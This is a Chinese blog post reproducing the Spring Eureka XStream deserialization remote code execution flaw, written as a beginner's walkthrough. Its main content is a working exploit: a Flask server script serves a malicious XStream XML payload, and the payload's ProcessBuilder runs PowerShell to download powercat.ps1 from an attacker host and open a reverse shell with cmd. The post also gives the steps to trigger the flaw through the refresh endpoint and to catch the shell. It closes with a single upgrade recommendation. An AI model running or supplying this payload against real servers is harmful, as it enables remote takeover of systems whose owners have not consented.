小白实战 | spring Eureka Xstream Deserialization RCE 漏洞复现

于 2024-05-21 18:02:25 发布
阅读量607 收藏 4
点赞数 9
分类专栏: web渗透 文章标签: spring eureka java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asanmaoa/article/details/139096171
版权

声明:

       该公众号大部分文章来自作者学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

一、使用工具

        1.vps服务器

        2.python 脚本

二、复现过程

1.访问网站服务器是否出网

2.访问 /act/refresh抓包修改post 多重放几次就可以反向代理

4.利用目标<command></command>标签中攻击载荷达成反弹shell

#!/usr/bin/env python
# coding: utf-8
# -**- Author: LandGrey -**-

from flask import Flask, Response

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods=['GET', 'POST'])
def catch_all(path):
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                  //攻击载荷,下边为windows反弹shell代码,分成三部分,
                  //1、执行的应用程序
                  //2、访问远程加载的程序
                  //3、执行程序
                    <command>
                       <string>powershell</string>
                       <string> IEX (New-Object System.Net.Webclient).DownloadString('http://0.0.0.0:8081/powercat/powercat.ps1'); </string>
                       <string>powercat -c 0.0.0.0 -p 9999 -e cmd</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>"""
    return Response(xml, mimetype='application/xml')


if __name__ == "__main__":
    //该文件是用于在payload中的地址,即为攻击机的ip,因为运行在本机上,直接写0.0.0.0即可,端口随意
    app.run(host='0.0.0.0', port=8000)

5.使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号,在修改完成就 启动脚本即可

6.监听反弹 shell 的端口

三、修复建议

  1. 将Spring Eureka的版本升级到安全的版本,例如,如果你使用的是Spring Cloud版本,可以升级到最新的修复版本(例如,如果是Hoxton.SR10,那么应该升级到Hoxton.SR11或更高)。

伏一
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Cloud Eureka服务治理的实现
08-27
Spring Cloud Eureka 服务治理实现 服务治理是微服务框架中最为核心和基础的模块,它主要是用来实现各个微服务实例的自动化注册与发现。Spring Cloud EurekaSpring Cloud 中的一个组件,它是基于 Netflix ...
2021-11-15 eureka xstream deserialization RCE复现分析
为之的博客
11-17 1540
漏洞成因 通过对/env进行post提交将eureka.client.serviceUrl.defaultZone的值修改为外部恶意url,然后通过/refresh post提交后,解析url内的xstream反序列化出命令执行代码 调试过程 先了解原理,可知通过/refresh会把外部恶意payload获取并解析,也就是说,导致这次漏洞形成的代码块应该在请求以及响应部分中。 开头先是以DispatchServlet来开始,一步一步去找到哪里会调用calc,调试断点如图所示: 在调试过程中会出现自动弹出计
Java配置47-Spring Eureka 未授权访问漏洞修复
JustDI0209的博客
11-03 7443
Spring Security 5.7.0-M2 中,WebSecurityConfigurerAdapter 被弃用了,Spring 鼓励用户转向基于组件的安全配置。这是因为从 Spring Boot 2.0 开始,默认情况下会启用CSRF保护,以防止CSRF攻击应用程序,导致服务注册失败。实在没招了,只能怀疑用的框架版本太低,去重新整一个,eureka 就用了个服务发现,问题不大。刷新 eureka 页面,也没有服务信息,服务注册失败了。我试了几个方法,没有替换掉,靠你了,耿小姐。
spring eureka漏洞_Spring boot相关漏洞利用(1)
热门推荐
weixin_39690958的博客
12-09 1万+
Spring boot 是 Spring 的一套快速配置脚手架,可以基于spring boot 快速开发单个微服务,Spring Boot,看名字就知道是Spring的引导,就是用于启动Spring的,使得Spring的学习和使用变得快速无痛。不仅适合替换原有的工程结构,更适合微服务开发。Spring Cloud基于Spring Boot,为微服务体系开发中的架构问题,提供了一整套的解决...
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 8425
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战
小心,别被eureka坑了
steven2xupt的博客
04-14 1346
Eureka是Netflix开发的服务发现框架,本身是一个基于REST的服务,主要用于定位运行在AWS域中的中间层服务,以达到负载均衡和中间层服务故障转移的目的。SpringCloud将它集成在其子项目spring-cloud-netflix中,以实现SpringCloud的服务发现功能。 Eureka包含两个组件:Eureka Server和Eureka Client。具体怎么部署这里就不说了,直接说问题 Eureka 客户端注册时需要配置服务端地址,类似如下配置 eureka: instance.
SpringCloud Netflix:微服务,Eureka,Ribbon
燕双嘤
08-02 453
微服务架构风格是一种将一个单一应用程序开发为一组小型服务的方法,每个服务运行在自己的进程中,服务间通信采用轻量级通信机制(通常用HTTP资源API)。这些服务围绕业务能力构建并且可通过全自动部署机制独立部署。这些服务共用一个最小型的集中式的管理,服务可用不同的语言开发,使用不同的数据存储技术。........................
【转载】JAVA常用组件未授权漏洞解析
最新发布
maoxiaotao的博客
02-04 623
java项目中,经常会使用一些监控类的组件来监控系统的状态,如果对这些组件没有做好权限控制,公网可以任意访问的话,就会泄露敏感信息,进一步造成更严重的危害。今天就来看一下,都有哪些组件。
SpringCloud】集群下 Eureka 的启动 bug,大坑
Java攻城狮修炼中
05-01 1125
如题,笔者创建了两个 Eureka Server 做集群,并引入了 Spring Security 在启动这两个 Server 就出现错误,会有各种 bug,比如 There was a problem with the instance info replicator com.netflix.discovery.shared.transport.TransportException: Cannot execute request on any known server DiscoveryClient_E
spring cloud eureka feign 实战
03-12
使用spring cloud中的eureka/feign/maven 构建实战例子,注意是采用maven,UserApiWeb(消费者)去调用UserApiImpl(提供者),UserApiEureka(注册中心),UserApi(api接口),消费者和提供者都是依赖接口来开发的。...
EurekaLog(程序漏洞分析检测工具)forwindowsV7.6.6.3.0安装版
08-01
EurekaLog是一个针对Delphi和C Builder的程序漏洞分析检测工具,能够帮助开发人员抓取异常和泄漏、并支持简单的项目完成修复工作,可兼容EXE压缩包,帮助用户快速检测到自己应用的漏洞。需要的朋友可以前来本站下载。 软件介绍 EurekaLog是针对Delphi和C Builder一个新的追踪异常的工具,使您的应用程序(如GUI、控制台、网络等)可捕捉所有异常,内存泄漏和检测
EurekaLog内存泄漏工具
07-22
EurekaLog内存泄漏工具:应用于多个IDE、可和exe壳兼容
Spring Cloud实战 _springcloud实战_springcloud_
09-30
Spring Cloud实战》一书深入探讨了Spring Cloud这一强大的微服务框架,它是当前软件开发领域中最受欢迎的构建微服务架构的工具。Spring Cloud基于Spring Boot的便利性,为开发者提供了全面的微服务开发支持,包括...
spring cloud eureka(免费下载)
03-25
最新版本的springcloud微服务实战,老版本与新版本差异较大,按照老的文章去使用新版本会有很多bug。
Spring Cloud Eureka
06-02
Spring Cloud EurekaSpring Cloud框架下的一个核心组件,主要用于服务发现和服务治理。Eureka借鉴了Netflix的开源项目,为分布式系统中的微服务提供高可用的服务注册与发现功能。在微服务架构中,每个服务都是独立...
Java第四十六天,SpringCloud框架系列(九),Eureka 问题修复
愿你饱经冷暖,仍保纯真
07-22 1230
Eureka 问题修复
SpringBoot漏洞大全
m0_67403188的博客
08-02 6764
前段时间做渗透发现了一个很眼熟的页面长这个样子页面log是去世界最大的同性交友网github.com搜了一下发现了一个十分详细的文章存在大量接口信息泄露成功交差。
spring_cloud_RCE(CVE-2022-22947)
Kris__zhang的博客
03-04 5368
简介 Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 环境 docker-compose up -d 利用 首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由: POST /actuator/gateway/routes/lemonlove7 HTTP/1.1 Host: 192.168.80.138:8080 A
Spring Eureka 未授权访问漏洞
05-11
Spring Eureka 是一个服务注册和发现的组件,它提供了一个 web 页面用于展示注册的服务信息。如果没有进行适当的安全措施,可能会导致未授权访问漏洞。 攻击者可以通过访问 Spring Eureka 的 web 页面获取到注册的服务信息,包括 IP 地址、端口号等敏感信息。同时,攻击者可以通过修改服务信息来进行攻击,比如修改服务的 IP 地址,让请求流量被重定向到攻击者的服务器上。 为了避免这种漏洞,可以通过以下方式进行安全措施: 1. 配置 Eureka 服务的安全认证,比如通过用户名和密码验证等方式进行访问控制。 2. 禁用 Eureka 的 web 界面,只允许通过 API 进行服务注册和发现。 3. 对 Eureka 服务进行访问日志记录和监控,及时发现异常请求并进行处理。 以上方法可以有效地避免 Eureka 未授权访问漏洞。同时,建议对所有的服务组件都进行安全措施的加固,确保整个系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值